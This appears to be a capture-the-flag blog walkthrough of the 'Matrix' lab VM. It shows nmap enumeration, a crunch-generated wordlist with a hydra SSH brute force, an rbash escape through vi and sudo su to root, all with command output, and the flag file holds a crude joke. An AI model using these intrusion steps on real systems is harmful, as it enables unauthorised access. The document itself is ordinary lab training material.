The Matrix has you! Another quite easy machine to take down this monday. It’s more suitable as CTF, not a real life example, but however it’s really entertaining.
This time the machine boots to a nice welcome screen. But since we have no idea what the password is, it’s as neat as useless.
Now to enumeration:
root@kali:~# nmap -sV -sC -O -A 192.168.89.130 Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-16 07:10 EDT Nmap scan report for 192.168.89.130 Host is up (0.00042s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.7 (protocol 2.0) | ssh-hostkey: | 2048 9c:8b:c7:7b:48:db:db:0c:4b:68:69:80:7b:12:4e:49 (RSA) | 256 49:6c:23:38:fb:79:cb:e0:b3:fe:b2:f4:32:a2:70:8e (ECDSA) |_ 256 53:27:6f:04:ed:d1:e7:81:fb:00:98:54:e6:00:84:4a (ED25519) 80/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14) |_http-server-header: SimpleHTTP/0.6 Python/2.7.14 |_http-title: Welcome in Matrix 31337/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14) |_http-title: Welcome in Matrix MAC Address: 00:0C:29:CB:4D:88 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 0.42 ms 192.168.89.130 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 24.38 seconds
We’ve got a SSH access and two web servers – on standard 80 port and on some weird 31337. I wonder if 31337 has some reference to the movie.
Ok, let’s check out the website:
Hmm, nothing important. If we check the page source code we would find a reference to an image:
port_31337.png looks like this:
Oh, I get it, “Follow the white rabbit”. Number 31337 must means something important. Remember that we saw the web server on this port during initial scan. Let’s go there:
Another web page with no active content. In the page source there’s an interesting code:
It’s base64 encoded text, so it’s not hard to “decrypt” it:
root@kali:~# echo ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg= | base64 -d echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix
Here’s another movie quote and it points to some file with a matrix extension. Let’s try it then:
Pin right from a haystack. Cypher.matrix is indeed a file we can download and read. It reads, well ..
This is a Matrix =) It doesn’t make any sense but google suggests that this “thing” is written in brainfuck – an esoteric programming language created in 1993 by Urban Müller. I have no idea how to read this so just google for translation.
Got it. I think with correct login and password we can access the machine via SSH. We have to bruteforce the password since the author is so forgetful. I think the easiest way is to generate a password list and to use it with hydra. We have a clue from previous step, so we just need two characters:
root@kali:~# crunch 8 8 -t k1ll0r@@ -f /usr/share/crunch/charset.lst lalpha-numeric-symbol14 -o mypassword.txt Crunch will now generate the following amount of data: 22500 bytes 0 MB 0 GB 0 TB 0 PB Crunch will now generate the following number of lines: 2500
We have 2500 passwords so it might take some time:
root@kali:~# hydra -l guest -P mypassword.txt 192.168.89.130 ssh Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-05-16 08:07:58 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 2500 login tries (l:1/p:2500), ~157 tries per task [DATA] attacking ssh://192.168.89.130:22/ [STATUS] 180.00 tries/min, 180 tries in 00:01h, 2324 to do in 00:13h, 16 active [STATUS] 166.67 tries/min, 500 tries in 00:03h, 2004 to do in 00:13h, 16 active [STATUS] 151.43 tries/min, 1060 tries in 00:07h, 1444 to do in 00:10h, 16 active [ssh] host: 192.168.89.130 login: guest password: k1ll0r7n
Ok, we have our correct password. Let’s use it with SSH:
root@kali:~# ssh email@example.com The authenticity of host '192.168.89.130 (192.168.89.130)' can't be established. ECDSA key fingerprint is SHA256:BMhLOBAe8UBwzvDNexM7vC3gv9ytO1L8etgkkIL8Ipk. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.89.130' (ECDSA) to the list of known hosts. firstname.lastname@example.org's password: guest@porteus:~$ ls -rbash: /bin/ls: restricted: cannot specify `/' in command names
Something is wrong here. We’ve got an access but we have restricted access with rbash. In fact it’s a common way for administrator to limit things guest can run. Luckily there are ways to avoid this restriction:
guest@porteus:~$ echo /home/guest/prog/* /home/guest/prog/vi
Great, we have vi. I hate vi except for moments like this one =) Let’s start vi and run a command:
Now we are in a proper shell, but we’re still just a user. To escalate our privileges we can use simple command:
Got it, now let’s see what others can do:
guest@porteus:~$ sudo -l User guest may run the following commands on porteus: (ALL) ALL (root) NOPASSWD: /usr/lib64/xfce4/session/xfsm-shutdown-helper (trinity) NOPASSWD: /bin/cp
It seems that we can just run sudo su now and try password that we already have:
guest@porteus:~$ sudo su We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility. Password: root@porteus:/home/guest#
And it does the trick. Now where is our flag, Mr.Anderson?
root@porteus:/home/guest# cd /root root@porteus:~# ls Desktop/ Documents/ Downloads/ Music/ Pictures/ Public/ Videos/ flag.txt root@porteus:~# cat flag.txt _,-. ,-' _| EVER REWIND OVER AND OVER AGAIN THROUGH THE |_,-O__`-._ INITIAL AGENT SMITH/NEO INTERROGATION SCENE |`-._\`.__ `_. IN THE MATRIX AND BEAT OFF |`-._`-.\,-'_| _,-'. `-.|.-'| |`.-'|_ WHAT | |_|,-'_`. |-._,-' | NO, ME NEITHER jrei | | _,' '-|_,-' IT'S JUST A HYPOTHETICAL QUESTION
Here it is.